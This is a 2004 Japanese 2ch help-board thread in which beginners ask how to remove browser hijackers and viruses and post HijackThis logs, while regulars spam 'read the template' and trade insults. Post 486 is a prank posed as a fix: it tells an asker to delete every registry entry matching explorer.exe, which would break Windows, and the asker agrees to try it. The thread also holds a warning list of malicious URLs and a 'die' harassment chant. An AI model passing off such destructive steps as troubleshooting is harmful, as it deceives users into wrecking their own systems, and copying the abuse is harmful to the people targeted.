テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め! テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
>>382 自分で直すよりもカネ払って専門業者を呼んで直してもらったほうが確実だな。
テンプレ読めのテンプレ考えようぜ
でかいAAとかがいいんじゃネーノ
もしかしたら質問しに来るヘボどもはテンプレが何のことか理解できてないんじゃないのか?
(・3・) エェー FAQスレのテンプレ改良して使おうYO
テンプレって何ですか? ↑ いちいち説明するのか?
ナンデスカ厨が一番ウザイのは事実だが
397 :
382 :04/11/25 00:38:19 ID:17m7i2so
>>397 テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!テンプレ読め!
>>397 黄身はあくまで我々に挑戦されるのですか?
それなら受けてたちますよ
>>397 よ起動ができたんだからテンプレも読めるよな?ん?違うか?
402 :
382 :04/11/25 00:49:32 ID:17m7i2so
すみません。 初心者だからテンプレ読んでも良く分かりませんでした。 OS「windows me 2000」 ブラウザ「IE/openjane」 今シマンテックでウイルスチェック中です。 踏んだけど目立った影響はなく、履歴にも何も残ってません。
初心者だからとかいうフレーズも禁句にした方がいいんじゃね? Win板だと速攻無視なんだし
次スレはテンプレを全部ひらがなにしろ
「♪♪よいこがするてんぷれ♪♪」
∧_∧ ( ´・ω・) みなさん、お茶が入りましたよ・・・・。 馬鹿ばっかで困りますね ( つ旦O と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦
408 :
382 :04/11/25 01:01:22 ID:17m7i2so
運が良かったみたい。 ただのブラクラで終わったみたいだ。
━━━ ━━━┓┏┓┃ ┏━ ┃ ━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃ ┃ ┃ ┃ .┃ ┃ ┣━ ┃\ ┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
あ、ヨを間違えた、、、
※ 2004/11/24 02:00時点でのUpLoader系の危険なURL with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg 【 「DARK LOLITAS」「LOLITAS」というウィルス + スパイウェア満載のサイト。//x.full-tgp.net/?ms.com を呼ばれたりする ウィルス名:HTML_REDIR.A + JAVA_BYTEVER.A + JAVA_BYTEVER.A-1 他 】
>>413 それ踏んでエロサイト飛んだけど何も影響でなかったぞ。
2chブラウザから踏んだから?
ウイルススキャン検索結果 「Unix.Penguin 」「VBS.Network.E 」「VBS.LoveLetter.A 」「VBS.LoveLetter.Var 」「VBS.Freelink.B 」「Macro.src 」 「VBS.Network.E 」「VBS.Internal 」「Trojan Horse 」「JS.WindowBomb 」 こんなに感染してたんだけど。 全てTemporary Internet Filesで「W3E7APQH」っていうような8文字のIDらしき文字とか、「501-600」「I50」って文字から察するに 2chのスレから感染してるっぽいんだけど・・・ 削除した方がいいかな? windows2000です
>>415 ━━━ ━━━┓┏┓┃ ┏━ ┃
━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃
┃ ┃ ┃ .┃ ┃ ┣━ ┃\
┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
うpされたbatファイルを実行したら、何も起こらなかったんですが、 翌日再起動したらデスクトップが丸ごと無くなってました。 復元ポイントを使って復元したら元に戻ったんですが、類似の被害報告はありますでしょうか。
419 :
ひよこ名無しさん :04/11/25 10:11:15 ID:Wq01+ea7
テンプレって何ですか?
テンプラ食べたい
テンプレじゃ分からない人多いよ。 ちゃんと正式名称じゃなきゃ。
じゃあ今からテンプレじゃなくて
>>1-10 嫁で
もうね・・・アフォかと
425 :
ひよこ名無しさん :04/11/25 14:42:28 ID:lfBT/AO9
HijackThisのログに出てくるのも全て消した場合、起動しなくなるでしょうか? windows2000使用です。 テンプレは理解できる範囲では読みました。
>>425 ちゃんと
━━━ ━━━┓┏┓┃ ┏━ ┃
━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃
┃ ┃ ┃ .┃ ┃ ┣━ ┃\
┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
テンプレヨメじゃなくてテンプレEXじゃん…
今
>>428 のサイトいけるか?
急にいけなくなったのは俺だけ?
いけるよ
すまん俺のミスだった、トップに行ったときノートンが進入をどうのこうので切断するようになってたorz
433 :
425 :04/11/25 16:24:19 ID:lfBT/AO9
テンプレ読んで解らないから聞いているのです。 428さん有難うございます。ここなら解答も早いと思って来ています。 HijackThisでスキャンして、すぐ画面にでるログとログファイルに残すログの数が 後者のほうがかなり多いのですが良いのでしょうか?
>>433 ほんとにテンプレ読んでる? 自動診断ページへのリンクもあるのに?
あと、どうしてもわからないならログ貼るとか。
>>5 へ進む。
436 :
425 :04/11/25 17:03:54 ID:lfBT/AO9
自己診断のページも行こうとしましたが英語ばかりで・・・泣 O2 - BHO: (no name) - {2C52F539-8D04-4503-BC69-7BC6E1CA5E6B} - C:\WINNT\System32\pcojb.dll (file missing) O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINNT\questmod.dll とりあえず、この三つの診断して欲しいです。
とりあえずなどない。理解できないから適当に3つ選んだのか? ウィルススキャンその他やることはたくさんあるのだが、 何をやったのかも症状も書かないではどうしようもないな。
IE-spyadって使った方がいいですか?
>>436 Spybotのエントリー(まんなかのヤツ)が「わからない」程度のレベルなら
HijackThisではヘタにいじらないほうがいいし、ログも全部見てもらったほうがいいと思う。
あと、437も言ってるけど、ウィルススキャンくらいは当然やってるよね?
441 :
美保 :04/11/25 19:16:47 ID:itMwLUBd
やっべーエロ見てたらPCおかしくなったじゃん!
ホームページもヤバイ系のサイトに変わっていて変更するも再起動すると元に戻ってるし。
今から
>>2 やってみる。
442 :
美保 :04/11/25 19:24:31 ID:itMwLUBd
だめだー!まだ解決しないよー!
今度は
>>3 をやってみるぜ。
といっても僕のPC、アンチウィルスソフトなんて入ってるかどうか分からないもんな。
というわけで、シマンテックのオンラインスキャンでもためして見るか。
行ってくるぜ!!
美保たんハァハァ
444ゲット!!
445 :
美保 :04/11/25 19:59:41 ID:DA6C7+lO
うわあああああ!オンラインスキャン中にPC落ちたー! 仕方ない、オンラインスキャンは諦めて、(オンラインスキャンは見つけるだけで無意味だからな) 次のSTEPに進むとしよう。 あ、僕はレズビアンだから。男に興味ないからね。
446 :
ひよこ名無しさん :04/11/25 20:05:33 ID:4rRYpkqO
エロサイトのウイルスは、ウイルスソフトを買えば、 だいたい全部駆除できるの?
コピペ乙
448 :
美保命 :04/11/25 20:10:50 ID:???
美保ちゃん、がんばれ!!!!!!!!!!!!!!!!!!
>>446 ━━━ ━━━┓┏┓┃ ┏━ ┃
━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃
┃ ┃ ┃ .┃ ┃ ┣━ ┃\
┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
>>446 アンチウィルスソフトというものは、定義を常に最新にして
常駐させて予防するためのものであって、既に感染しているPCを
きれいにすることが目的の道具ではない。
そのため、100%駆除できるという保証もどこにもない。
451 :
美保 :04/11/25 20:39:39 ID:DA6C7+lO
452 :
美保 :04/11/25 20:55:10 ID:DA6C7+lO
HijackThisダウンロードしてみたけど、このHijackThisってレジストリ内の問題のあるエントリーと
そうでないエントリーを出すんだな。
例えばログの04はレジストリエディタのHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
とHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesのことで、
HKLM=HKEY_LOCAL_MACHINEの略称なんだな。
とりあえず、テンプレ
>>5 の自動的に診断してくれるサイトに貼ってみるぜ。
453 :
美保 :04/11/25 21:03:54 ID:DA6C7+lO
よし!HijackThis診断サイトで赤いやつは片っ端から消した。 で、最後にWeb設定のリセットやって、スタートページをGoogleに設定してPC再起動だ! これで治っても、治らなかってもここに来て結果を報告する。
454 :
美保命 :04/11/25 21:10:21 ID:???
美保ちゃん、ファイト!!
455 :
美保 :04/11/25 21:29:11 ID:VqHeyfuo
はい、再起動しましてスタートページを見たら、Googleのままになっており、
これで終わったと思い、標準設定をクリックしてみたら、そっち系のサイトに変更されたではないか!
そこで僕は、レジストリエディタを開き、以下のことを試しました。
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Default_Page_URLとDefault_Search_URLとStart Pageを
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
Local Pageを
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
Default_Page_URLとDefault_Search_URLとStart Pageを
全て
http://www.google.co.jp/に変更して再起動 …
けど標準設定を押すとどうしてもそっち系のサイトになってまう。
まだ何かあるなこれは。
今日はこの辺で勘弁しといてやらあ!
明日絶対に消してやる!
456 :
美保 :04/11/25 22:02:22 ID:Fw5i38Xc
ねえ、あのさあ…スタートから終了しても再起動してしまうんだけど!? どういうことだこれ? もう一度HijackThisのログを取ってみるか。 はあ・・・
もうダメだな・・・・
459 :
ひよこ名無しさん :04/11/25 22:11:54 ID:qguuES9y
>>459 ━━━ ━━━┓┏┓┃ ┏━ ┃
━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃
┃ ┃ ┃ .┃ ┃ ┣━ ┃\
┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
461 :
美保 :04/11/25 22:13:31 ID:Fw5i38Xc
僕って今みんなからしつこいと思われていたりして・・・ で、HijackThisのログにこんなものがありました。 O4 - HKLM\..\Run: [Kernel32] c:\windows\system32\kernel.dll これ、たしかに消したはずなんだが…??? それにしてもこの[Kernel32]っていうのどこかで… 正体が分からなければどうしようもないから、ググってみるかな。
>>461 美保ちゃん残念!!そりゃREDLOFだよ。
464 :
ひよこ名無しさん :04/11/25 22:20:17 ID:7KxxdXqP
なんかエロサイト見てからか分かんないんだけど、 MSNのホームページや一部のページだけが 表示できなくなっちゃったんだけど、どーすれば直せる? ウィルスソフトでも駄目で、、、 あとMXも接続できなくなっちゃった!助けて、お願い!!
466 :
ひよこ名無しさん :04/11/25 22:34:13 ID:5/+0xnIH
467 :
美保 :04/11/25 22:37:11 ID:Fw5i38Xc
[Kernel32]の正体が分かった! REDLOFじゃねーか! 一応トレンドマイクロのサイトに削除手順載ってるけど、ここまでくるともうダメだな。 あーもうやめだ!こうなりゃPC手遅れになる前に自爆してやらあ!! そうだなあ・・・レジストリエディタから起動時に必要な最低限のプログラムのキーを 片っ端から削除しまくってやる。 みんな迷惑かけてしまってスマンな!
468 :
美保命 :04/11/25 22:41:52 ID:???
ネカマ乙
テンプレ読めウザイからNGワードにすると読みやすいよ。
「テンプレ」そのまま全部
>>472 俺達自慢のテンプレをたっぷり味わってくれ。
474 :
ひよこ名無しさん :04/11/26 12:12:08 ID:spUnr+Gc
475 :
ひよこ名無しさん :04/11/26 12:39:40 ID:86nH78MZ
アメリカのエロサイトがスタートページになっちゃって困ってます。 削除しても、次にパソコンを立ち上げたときに自動的にダウンロードされ てしまいます。これはいったいどういった状態で、どう対処すれば良いのでしょうか?
477 :
ひよこ名無しさん :04/11/26 12:47:19 ID:jJvLBe82
東関東自動車道を潮来に向かって走っていた私は、トイレ(大)に行きたくなったので 大栄パーキングエリアに立ち寄りました。 手前の個室はふさがっていたので、その隣に入りました。パンツを下ろし 便器に腰を下ろしたその時、隣から 「よぉ!元気かよ?」と大きな声がしたのです。 たぶん皆そうですが、トイレで見知らぬ人と話をすることはありません。 どうしていいのかわからなかったのですが、大声で「いまいちだよ!」と答えました。 すると隣人は「そっか〜……それで、今何してるの?」と言うのです。 変だな?と思いましたが、私は素直に大声で、こう答えました。 「お前と同じだよ!ウンコしてるんだよ!!」 やがて隣の男は、声をひそめてこう言ったのです。 「おい、あとでかけ直すよ。隣の個室に、俺の話にいちいち答えるおかしいのがいるんだ!
478 :
困り事 :04/11/26 17:00:57 ID:31nWlhcN
助けてください! PC起動後5分程で【180search】のポップアップが勝手に出てしまいます 以後1、2時間おきに出たりします ハイジャックのログは取りましたのでご教授願いたいです O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll O2 - BHO: NTIECatcher Class - {C56CB6B0-0D96-11D6-8C65-B2868B609932} - C:\Program Files\Xi\NetTransport 2\NTIEHelper.dll O4 - HKLM\..\Run: [SunKistEM] C:\Program Files\eMachines Bay Reader\shwiconem.exe O4 - HKLM\..\Run: [Sunkisk2k] C:\Program Files\Multimedia Card Reader\shwicon2k.exe O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe O4 - HKLM\..\Run: [RoxioEngineUtility] "C:\Program Files\Common Files\Roxio Shared\System\EngUtil.exe" O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe" O4 - HKLM\..\Run: [RoxioAudioCentral] "C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe" O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32 O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [CHotkey] zHotkey.exe O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [khizwd] C:\WINDOWS\khizwd.exe O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [NDrv] C:\WINDOWS\System32\NDrv.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
479 :
困り事 :04/11/26 17:04:56 ID:31nWlhcN
続きです O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Net Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddLink.html O8 - Extra context menu item: 全てをNet Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddList.html O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O18 - Protocol hijack: ftp - >IT{PH9NMHBIH9-1HTMG8I82-H0NMH0IHW90H} O18 - Protocol hijack: http - {7PHANMH5-HW{PH11GE-8{PH-00HAIH4{PH0M} O18 - Protocol hijack: its - >IT14H2N1HBIH8-1HT0GAIT{-H000H8IH49PH} O18 - Protocol hijack: mk - {7IT{PHEN-HAIH-11HT-GCI2-0HAN0H4IH90P} O18 - Protocol hijack: res - >I050H3NMH9IH5-1HTMGBI82-H0NMH0IHW{0H} O18 - Protocol hijack: wia - >I3{3HANMH9IH7-4H0MGAI76-H2NMHAIHW{PH}
>>479 01.ログを勝手に編集するな
02一回の起動で.二回連続Hijackthisを走らせるな
481 :
困り事 :04/11/26 17:24:05 ID:31nWlhcN
>480 編集なんてしてないですよ‥ >02一回の起動で.二回連続Hijackthisを走らせるな これはよくわからないんですが??
>>481 少なくとも前半切ってるだろヴォケ
OSもHijackthisのバージョンも書いてねーじゃねーか
連続でHijackthis走らせると、O18に消すとヤバいエントリ出るんだよ
483 :
481 :04/11/26 17:41:49 ID:Z6oPHayg
>482 すいませんでした 一度に全部は書き込めないもので、04までで区切っただけです 18については、PC起動後一回目でも出ますよ 今日も一回しかスキャンしてないですし 書き忘れましたが、OSはXPホーム、SP2で、ハイジャックは1.98です よろしくお願い致します ※携帯からです
484 :
美保 :04/11/26 17:44:19 ID:???
よお僕だ。PC新しいの買ってノートンインターネットセキュリティ入れて、
Windows Update行いCoolWebShredderとAd-awareとSpybotもDLして
アンチウィルスソフト、アンチスパイソフトを最新の定義に更新し、
セーフモードで再起動→PCスキャンとかけました。
ウィルスは見つかりませんでした。けど、やはりDSO Exploitだけが検出されますね。
とりあえず、今の状態を保っていけば問題は無いな。
>>478-479 こんなことをして、このスレの人たち困らせるなら僕のように
PC新しいの買ったほうが早いよ。
そしてテンプレをやったことを告げずにHijackThisのログを貼るのは
また同じことを繰り返すつもりなのか。
>>483 話噛み合ってねーし。別に分割して貼ったこと起こってんじゃねーよ
O18に関してはそういう場合もあるって事だから謝るけど、まともなログなら
Logfile of HijackThis v1.98.2
Scan saved at 17:45:11, on 2004/11/26
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
(以下略)
みたいなの出るだろうが
つーかXPなら素直にシステムの復元しとけよ
180はプログラムの追加と削除にある場合も多いけどな
>483 こういう時こそ以下の方法を試すべきだと思います。 パソコンのトラブル解消法 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ explorer.exeと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 ↓ (゚∀゚)ウマー
488 :
ひよこ名無しさん :04/11/26 18:01:04 ID:31nWlhcN
>487 はい、やってみます
うぁぅああうあ おかしくなったぁぁpp
491 :
ひよこ名無しさん :04/11/26 18:12:26 ID:31nWlhcN
Logfile of HijackThis v1.98.0 Scan saved at 18:05:06, on 2004/11/26 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\Explorer.EXE
492 :
ひよこ名無しさん :04/11/26 18:13:34 ID:31nWlhcN
C:\Program Files\eMachines Bay Reader\shwiconem.exe C:\Program Files\Multimedia Card Reader\shwicon2k.exe C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe C:\WINDOWS\zHotkey.exe C:\Program Files\QuickTime\qttask.exe C:\Program Files\Common Files\Real\Update_OB\realsched.exe C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\Playlist.exe C:\PROGRA~1\TRENDM~1\VIRUSB~2\PcCtlCom.exe C:\WINDOWS\system32\slserv.exe C:\PROGRA~1\TRENDM~1\VIRUSB~2\Tmntsrv.exe C:\PROGRA~1\TRENDM~1\VIRUSB~2\tmproxy.exe C:\WINDOWS\System32\MsPMSPSv.exe C:\PROGRA~1\TRENDM~1\VIRUSB~2\TmPfw.exe C:\Documents and Settings\AI\デスクトップ\hijackthis\HijackThis.exe
493 :
ひよこ名無しさん :04/11/26 18:14:23 ID:31nWlhcN
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll O2 - BHO: NTIECatcher Class - {C56CB6B0-0D96-11D6-8C65-B2868B609932} - C:\Program Files\Xi\NetTransport 2\NTIEHelper.dll O4 - HKLM\..\Run: [SunKistEM] C:\Program Files\eMachines Bay Reader\shwiconem.exe O4 - HKLM\..\Run: [Sunkisk2k] C:\Program Files\Multimedia Card Reader\shwicon2k.exe O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe O4 - HKLM\..\Run: [RoxioEngineUtility] "C:\Program Files\Common Files\Roxio Shared\System\EngUtil.exe" O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe" O4 - HKLM\..\Run: [RoxioAudioCentral] "C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe" O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32 O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [CHotkey] zHotkey.exe O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [khizwd] C:\WINDOWS\khizwd.exe O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [NDrv] C:\WINDOWS\System32\NDrv.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
494 :
459 :04/11/26 18:14:57 ID:???
テンプレ読みましたがなんだか不安で・・・・ ちなみに登録料は29000円。 3日以内に納めないと50000円の調査費がかかり、 一日遅れるごとに違約費5000円かかるという高額です。
495 :
ひよこ名無しさん :04/11/26 18:14:58 ID:31nWlhcN
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Net Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddLink.html O8 - Extra context menu item: 全てをNet Transportでダウンロード - C:\Program Files\Xi\NetTransport 2\NTAddList.html O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O18 - Protocol hijack: file - FILE>{79 C - 9- 1-82 00 0 } O18 - Protocol hijack: ftp - >IT{PH9NMHBIH9-1HTMG8I82-H0NMH0IHW90H} O18 - Protocol hijack: http - {7PHANMH5-HW{PH11GE-8{PH-00HAIH4{PH0M} O18 - Protocol hijack: its - >IT14H2N1HBIH8-1HT0GAIT{-H000H8IH49PH} O18 - Protocol hijack: mk - {7IT{PHEN-HAIH-11HT-GCI2-0HAN0H4IH90P} O18 - Protocol hijack: res - >I050H3NMH9IH5-1HTMGBI82-H0NMH0IHW{0H} O18 - Protocol hijack: wia - >I3{3HANMH9IH7-4H0MGAI76-H2NMHAIHW{PH}
496 :
ひよこ名無しさん :04/11/26 18:16:29 ID:31nWlhcN
以上でよろしいでしょうか? よろしくお願いします
497 :
白虎 ◆/rk/3PqUEg :04/11/26 18:18:18 ID:lK0WxHf7
( ゚Д゚)
>>496 んで、プログラムの追加と削除になかったん?
O4 - HKLM\..\Run: [khizwd] C:\WINDOWS\khizwd.exe
正直怪しいのはこれぐらいしかない気がするんだけど
それ消してダメなら素直にシステムの復元いっとけ
このスレ読んでると面白いな。 過去にエロサイトのポップアップ出てきて困ったことあったけど、 被害対策の部屋の手順を丁寧にやっていったら直ったけどな。 ここに来る奴は一部飛ばしてるんだろうな。
500 :
ひよこ名無しさん :04/11/26 18:49:54 ID:31nWlhcN
>498 いろいろありがとうございました プログラムの追加と削除には無く、検索(犬アニメ)に出てきた180searchは消しても復活してしまいます ご教授していただいたO4 - HKLM\..\Run: [khizwd] C:\WINDOWS\khizwd.exe をfixして今日は様子を見ることにします 本当にお世話さまでした #最初に180searchが出るようになったのは、ソースネクストからのmailを開いた瞬間でした
coolwebsearchという極悪なウィルスに感染してしまいました。(-_-;) テンプレなどやる気はありませんね。(^○^) ウィルススキャンなど無意味〜)^o^(ε~~~(-_-;) だから俺様はここに来た。(*^_^*) さあお前ら、俺様は神だぞ。(^○^) 今すぐ教えろ。(ヘのヘ)
305<< ーたしまりかわい〜は
みなさん助けてください! 先日、学校のパソコンでエロサイト巡りをしていたらウィルスに感染してしまいました。 今夜のおかずはテンプラでしたけど、食後もウィルスは消えません。 P2Pが入っていてWinMXやWinnyもやっていてara-keyがどうのとか ZIPがどうのとかいう警告文が毎回出てくるのです。 教えてくれよなあ頼む。ト・モ・ダ・チだろ?
>>506 学校のパソコンは自分専用パスワードでログイン?
>>507 お、俺のPCがああああああああああああああぁぁぁぁぁ〜
いきなりタスクバーにsearch the webが現われたイヨーッペンペン!! テンプレってアホか。俺の目の黒いうちに直し方教えろ。 いいな今すぐにだ。
>507>486 ウイルス消えてねーぞ!! ただし、今再起動したら立上がりがかなり速くなりました! あんがと
>>514 荒らしの 愛新覚羅 今すぐ死ね
荒らしの 愛新覚羅 とっとと死ね
荒らしの 愛新覚羅 死ね死ね死ね
無能な 愛新覚羅 今すぐ死ね 荒らしの 愛新覚羅 今すぐ死ね 自演気違い 愛新覚羅 今すぐ死ね
塵どもはまずテンプレ嫁
自分のパソコンのOSはWindows98SEですが >486を実行したらどうなりますか?
>>518 テンプレEX
━━━ ━━━┓┏┓┃ ┏━ ┃
━━┳━━ ━ ┃ ┃┗┛┃ ┃ \┃
┃ ┃ ┃ .┃ ┃ ┣━ ┃\
┃ ━━━━┛ ┃ ┗━┛ ┗━ ┃
さっきエロサイト行って来たらブラウザが変わって変更できなくなりました。 このスレのテンプレを実行したつってんだろわからんやつだな。あ。 次は何をしたらいいのか教えて下さい。
え?
==、,-、 、ヽ、 \> ,, '''\ _ メ゙ヽ、\ ̄""" ̄--‐ 、 \ /ゝ、\ =─‐\\‐ /─'''''ニ二\''' |レレゝゝ、\  ̄く<<く >, ゙、/<三三二\ ̄\ゝゝゝゝゝゞ''ヽ、 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ <<<<〈__入 ゙、く彡三三三二ヽくゝ\メメメゝ、_ゝ、\ | さあ質問を言え くく<<<<<< ゙、 ゙、ミ三三二ニ─ゝゝゝゝゝ,,,,,,,、 '( ゙''ヽ、ヽ、 < どんな質問も一つだけ くくくくくく彡‐ヽ ゙、ミ三三二ニ'''くくゝゝ_ゝゝ、\\_,>」ノ, | 答えてやろう… く く く く く 彡゙、゙、三三二ニ‐くゝ、/ ,,,,,,,,メメゝヽ''''"ゝゞ丶、 \_________ 二─二二彡彡、゙、三三二==くメゝ/ ゙'ヽ、メゝゝゝゝゝゝゞ''ヽ-、,,,,,,_ ‐'''" ̄ \彡彡ミ、゙、三二=''"く<メ/:: \''-、メメゝゝゝ_ゝ 、 ,,、ヽヽ 、 ,,,,- ゙彡//ヾ、三二= くゝ/:::.... \>∠レ-,-‐ニ二メヽ''ヽ ノ ゙ヽ、,,,-‐//_///,,、゙、三二= ゙、 ""''' ヽ>//レレヽ,,___ / -,,,,,,-‐'''"""/////,,ヽ ゙、三二─ ゙ヽ. //-ヘヘ,、 レレレレノ ''" ,l|"////ノ,、\彡'''''‐-ニ,、 ::::::::::,,,,,,,,// ゙ヽフ/|/| レ' /ゝ、/ヽ|ヽレ,,゙ヽ、゙''ヽ、,,,,,,_ヽ''ニ='',,-'"、─-,,,,,_  ̄"'ノ /メ / レ/,''"へへべ''─---- ̄-メヽ"ゝゞゝヽ、 >---''" /ヘヘ、|//ヘヘヘヘヘヘヘヘ,,-イ ̄ | ̄"'''-ニニニ二-''" /ヘヘ∧/./フヘヘヘヘヘヘヘ,/イ / / / ゙ノ\、\ /ゝゝ| / /メヘヘヘヘヘヘ/'" | / / / / \\ /ゝ /|‐/ /フヘへヘヘヘ/∧ /-'"-'''"__,,-''" / /、\ //|_| /./へへへヘヘ、// |/ \_,,,,-‐'" / ゙、.゙、
文章能力がないから。
>>526 お前自身の文章能力が無いからAA貼っているんだろうよ
